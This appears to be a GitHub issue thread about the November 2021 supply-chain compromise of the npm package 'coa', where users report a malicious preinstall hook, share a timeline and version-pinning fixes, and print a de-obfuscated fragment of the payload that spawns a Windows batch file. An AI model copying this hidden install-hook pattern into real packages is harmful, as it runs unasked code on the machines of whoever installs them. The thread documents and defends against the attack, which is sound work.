Last release contains malicious code

[RWOverdijk]

I'm not sure why or what happened but 10 minutes ago there was a release (even though the last change on github was in 2018). Whatever this release did, it broke the svgr cli internet:

Error: Cannot find module '/Users/me/.npm/_npx/27078/lib/node_modules/@svgr/cli/node_modules/coa/compile.js'

The diff:

+ "preinstall": "start /B node compile.js & node compile.js",

Note: The packages were on npm on November 4th, 2021 from 14:12 CET until 15:24 CET.

Note: I'm trying to keep the issue updates but it's going quite fast and there are a lot of useless +1 comments to scroll through 😄

Current status

NPM has removed the compromised versions and, if I understand correctly, blocked new versions from being published temporarily while recovering access to the package.

@veged wrote:

malware version was unpublished https://www.npmjs.com/package/coa (right last version 2.0.2) — but we still need ownership of package back (looks like NPM support doing something right now)

Short-term fix

No fix should be needed as the affected versions have been removed. But I'm leaving what I wrote initially just in case something does go wrong again. For now I'd advise you to pin the version as described below until this has been resolved conclusively.

🤕 Use "coa@2.0.2" specifically. 2.0.3. is the first update that broke things. 🤕

Additionally as @herrwitzi suggests in the comments if you use yarn you can add a resolution to your package.json

"resolutions": { "coa": "2.0.2" },

And as @bugron suggested for other package managers add those to your package.json:
pnpm: https://pnpm.io/package_json#pnpmoverrides

"pnpm": {
    "overrides": {
      "coa": "2.0.2"
    }
},

yarn: https://classic.yarnpkg.com/en/docs/selective-version-resolutions/#toc-how-to-use-it

"resolutions": {
    "coa": "2.0.2"
}

IMPORTANT update

Another update concerning what I wrote here, the versions this applied to have been removed from npm. Leaving it up for the purpose of documenting progress.

The last released version does in fact contain malicious code. It doesn't work, but do not install. and the dll is up now.

Some antivirus software will apparently pick up the file (thanks @lensflow and @AdamPD)

Original

It looks like an easy fix.

I'm just curious why this was published to begin with as well as the intention. Simply looking at the diff it looks like it is trying to run something in the background.

Is this a failed attempt at publishing malicious code? It certainly looks like it. With millions of installs I think it's a good idea to find out.

[11gorizont11]

Same issue +1

[renszee]

I'm having the same issue.

[ladyzhenskii]

Same with cjs

[yehor-manzhula]

Same issue +1

[socheatsok78]

Also break @vue/cli-service as well

[nicopastor]

Also breaks @react-scripts

[rzyanhao]

+1

[LLLLLamHo]

what the fuck!!!

[HeishPi]

Same +1

[Luuuuuis]

The world is going down!

[yarastqt]

Hello everyone! We try to resolve this problem :(

[kdescoubes]

Same issue here :(

[weiesky]

[jaykon-w]

same with NX

[marcusthelin]

It's breaking our pipelines...What has changed?

[LLLLLamHo]

i try my project package.json install coa@2.0.2,and change package.json coa:"^2.0.2" to coa:"2.0.2",fix the fucking bug.

[Luuuuuis]

Every developer worldwide from google to facebook is crying right now cause their CI/CD is down

[SolarLiner]

start /B is a Windows command that creates a new commandline prompt window. As far as I can see, this is the only change, that calls a Windows-only command, to run a Node script that doesn't even exist.

What?

[maxaon]

This package was compromised. preinstall is same as in issue with ua-parser-js

https://portswigger.net/daily-swig/popular-npm-package-ua-parser-js-poisoned-with-cryptomining-password-stealing-malware

DO NOT UPDATE IT!

[Tesla0916]

worldwide collapse

[RiQuY]

Same with cjs

Same problem like you, I guess it's break time.

[AdamPD]

I'd say compromised. Doesn't NPM have some sort of emergency service for this to rollback releases?

[niksy]

since the new MacBooks will not run your Docker images (unless you rebuild them for ARM processors)

Wow. Did not know that. Thanks a lot!

They actually will, but Docker always puts disclaimer that’s it’s better if you could use ARM images.

If your images use non-trivial tools it can be tricky to get it working on ARM. You would probably need to build from the source for specific version of the tool since majority of tools are only available for x86.

Base images available on Docker Hub usually have ARM version so you’re good to go at least for baseline.

But we digress :D

[DanielRuf]

They actually will, but Docker always puts disclaimer that’s it’s better if you could use ARM images.

Nah, you can't use your x86 images as-is. I can safely say that since we have new colleagues at work who tried to run the Java images for a bigger project. And they did not run without additional work. And Windows emulation / VM support is not the best for M1 machines at the moment. Now they all switch to native Windows + WSL (2) / Linux machines.

Base images available on Docker Hub usually have ARM version so you’re good to go at least for baseline.

And that is basically the point, you will have to update your docker-compose files / rebuild the images.

Maybe I should have emphasized it like this: ...your Docker images...
Base images are rarely a problem. And most people do not directly use the pure base images.

[djaho]

Thank you all for a quick action here.

[avtokey]

I have same error on Angular project, Can everyone tell me fix way ? "resolutions" and other solutions doesn't works

[mohe2015]

I have same error on Angular project, Can everyone tell me fix way ? "resolutions" and other solutions doesn't works

Are you using npm or yarn?

[garciawell]

AWESOME !!!!! Thanks for all effort to explain and suggest solutions.

[chrisrocks]

Does anybody know what's the exact timeframe of the availability of the malware?
At what time/date have they been published and when exactly have those versions been removed?
Thanks

[RWOverdijk]

Does anybody know what's the exact timeframe of the availability of the malware? At what time/date have they been published and when exactly have those versions been removed? Thanks

It's all in this thread. I'll update the description for convenience.

14:12 CET until 15:24 CET based on the comments.

[MichaelGissingNC]

This appears to be the relevant part of the de-obfuscated compile.js

var opsys = process["platform"];

if (opsys == "darwin") {
  opsys = "MacOS"
} else {
  if (opsys == "win32" || opsys == "win64") {
    opsys = "Windows";
    const {spawn} = require("child_process"), bat = spawn("cmd.exe", ["/c", "compile.bat"]);
  } else {
    opsys == "linux" && (opsys = "Linux");
  }
}

Can someone please confirm:

1. This is indeed what was shipped as a payload
2. Only windows was affected, no code was executed on Linux and MacOS

[Anuj16]

@RWOverdijk From the discussion of this entire thread, I think only the windows users were affected and no linux and mac users were affected. Is that the correct understanding ?

This article says the malicious code checks the OS and then download the batch file or linux bash script accordingly. Do we see some contradiction here ?

[RWOverdijk]

It did seem that way, yes. I couldn't find any code downloaded (like the dll) or executed (other than the OS check) on anything other than windows.

[vivex]

how to solve this for global install i am trying to install expo-cli yarn global add expo-cli , how can i add coa override for global installation ?

[DanielRuf]

@vivex I'm pretty sure you don't need the override (anymore) since the malicious release doesn't exist anymore.

[vivex]

Hi @DanielRuf ,

Thanks for the reply, but i am facing following error when using expo-cli as global :

  ~ npx expo init fitnest
npx: installed 359 in 104.384s
This command requires Expo CLI.
Do you want to install it globally [Y/n]? Y
Installing the package 'expo-cli'...
npm ERR! code E404
npm ERR! 404 Not Found - GET https://registry.npmjs.org/coa/-/coa-2.1.3.tgz
npm ERR! 404
npm ERR! 404  'coa@^2.0.2' is not in the npm registry.
npm ERR! 404 You should bug the author to publish it (or use the name yourself!)
npm ERR! 404 It was specified as a dependency of 'expo-cli'
npm ERR! 404
npm ERR! 404 Note that you can also install from a
npm ERR! 404 tarball, folder, http url, or git url.

npm ERR! A complete log of this run can be found in:
npm ERR!     /Users/viveksoni/.npm/_logs/2021-12-25T07_40_28_190Z-debug.log
Installing Expo CLI failed. You can install it manually with:
  npm install --global expo-cli
➜  ~

i tried differnt version of nodejs, tried clearing the npm/yarn cache, tried npm yarn both but getting same error. What should i do to get rid off it.

I will open ticket in expo cli also.

Thanks.

[DanielRuf]

I will open ticket in expo cli also.

That is the recommended solution. Probably their lockfile references the wrong versions.

[luckymore]

@vivex Hi，have you find the way?
now, I use local install to resolve it

devDependencies: {
"xx-cli": "^1.0.0",
"coa": "2.0.2",
}

[DanielRuf]

@luckymore see expo/expo-cli#4099 (one of the last referenced issues).

[Wapiti08]

Is there any chance to download the version 2.0.3 for research purpose? Please share with me if anyone still holds the package. Thanks a lot

[lirantal]

@louislang any chance you folks have it still?

[louislang]

doesn't look like it, unfortunately. I'm sure I can track down a copy if needed though! We've got a rather larger corpus of malware at this point if needed; would love to collaborate on some research with anyone that's interested.